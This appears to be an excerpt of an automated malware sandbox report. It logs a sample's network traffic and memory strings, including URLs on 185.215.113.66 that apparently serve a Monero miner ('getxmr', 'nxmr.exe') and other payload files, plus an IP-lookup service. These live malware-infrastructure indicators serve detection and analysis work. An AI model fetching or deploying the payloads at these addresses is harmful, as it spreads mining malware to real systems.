                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:35 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:42 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:46 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 88.200.240.149
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 88.200.240.149
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 88.200.240.149
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.255.212.22
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.255.212.22
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Http://185.215.113.66/5
                            Source: sysesvcmw.exe, sysesvcmw.exe, 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.215.113.66/
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002C5000.00000004.00000020.00020000.00000000.sdmp, sysesvcmw.exe, 00000005.00000002.889397033.0000000000274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.0000000000274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1C:
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1bbC:
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                            Source: 2550821914.exe, 00000004.00000000.370258337.0000000000414000.00000008.00000001.01000000.00000004.sdmp, 2550821914.exe, 00000004.00000002.381787142.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, 2550821914.exe, 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmp, sysesvcmw.exe, 00000005.00000000.379474721.0000000000414000.00000008.00000001.01000000.00000005.sdmp, sysesvcmw.exe, 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmp, sysesvcmw.exe, 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.215.113.66/2u9o0b7n
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4
                            Source: sysesvcmw.exe, 00000005.00000002.889729405.000000000247C000.00000004.00000010.00020000.00000000.sdmp, sysesvcmw.exe, 00000005.00000002.889397033.00000000002A9000.00000004.00000020.00020000.00000000.sdmp, sysesvcmw.exe, 00000005.00000002.889397033.00000000002F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                            Source: sysesvcmw.exe, 00000005.00000002.889729405.000000000247C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5G
                            Source: 1925824589.exe, 1925824589.exe, 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmp, 1925824589.exe, 00000009.00000002.892928931.0000000002A5B000.00000004.00000010.00020000.00000000.sdmp, 1925824589.exe, 00000009.00000002.889442870.00000000003BD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/from/
                            Source: 1925824589.exe, 00000009.00000002.891717748.0000000000464000.00000004.00000020.00020000.00000000.sdmp, 1925824589.exe, 00000009.00000002.892928931.0000000002A5B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/from/706.txt
                            Source: 1925824589.exe, 00000009.00000002.891717748.0000000000464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/from/706.txtn
                            Source: 1925824589.exe, 00000009.00000002.892928931.0000000002A5B000.00000004.00000010.00020000.00000000.sdmp, 1925824589.exe, 00000009.00000002.889442870.00000000003BD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/from/H
                            Source: 1925824589.exe, 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.66/from/Tmlr
                            Source: 1925824589.exe, 00000009.00000002.892928931.0000000002A5B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/from/http://185.215.113.66/from/n.txtB
                            Source: 1925824589.exe, 00000009.00000002.891717748.0000000000464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/from/n.txt
                            Source: 1925824589.exe, 00000009.00000002.891717748.0000000000464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/from/n.txtz
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002C5000.00000004.00000020.00020000.00000000.sdmp, sysesvcmw.exe, 00000005.00000002.889684292.0000000001EB1000.00000004.00000020.00020000.00000000.sdmp, sysesvcmw.exe, 00000005.00000002.889397033.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/getxmr
                            Source: sysesvcmw.exe, 00000005.00000002.889397033.00000000002C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/getxmr%
                            Source: sysesvcmw.exe, 00000005.00000002.889684292.0000000001EB1000.00000004.00000020.00020000.00000000.sdmp, 150623101.exe, 150623101.exe, 0000000B.00000002.882391738.0000000000022000.00000002.00000001.01000000.00000007.sdmp, 150623101.exe, 0000000B.00000002.882455060.000000000042D000.00000004.00000020.00020000.00000000.sdmp, 150623101.exe, 0000000B.00000000.862714425.0000000000022000.00000002.00000001.01000000.00000007.sdmp, 150623101.exe, 0000000B.00000002.882455060.00000000003F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/nxmr.exe
                            Source: 1925824589.exe, 1925824589.exe, 00000009.00000000.536791505.0000000000EA4000.00000002.00000001.01000000.00000006.sdmp, 1925824589.exe, 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmp, 1925824589.exe, 00000009.00000002.891717748.000000000049C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                            Source: 1925824589.exe, 00000009.00000000.536791505.0000000000EA4000.00000002.00000001.01000000.00000006.sdmp, 1925824589.exe, 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://icanhazip.com/.
                            Source: sysesvcmw.exe, 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: sysesvcmw.exe, 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
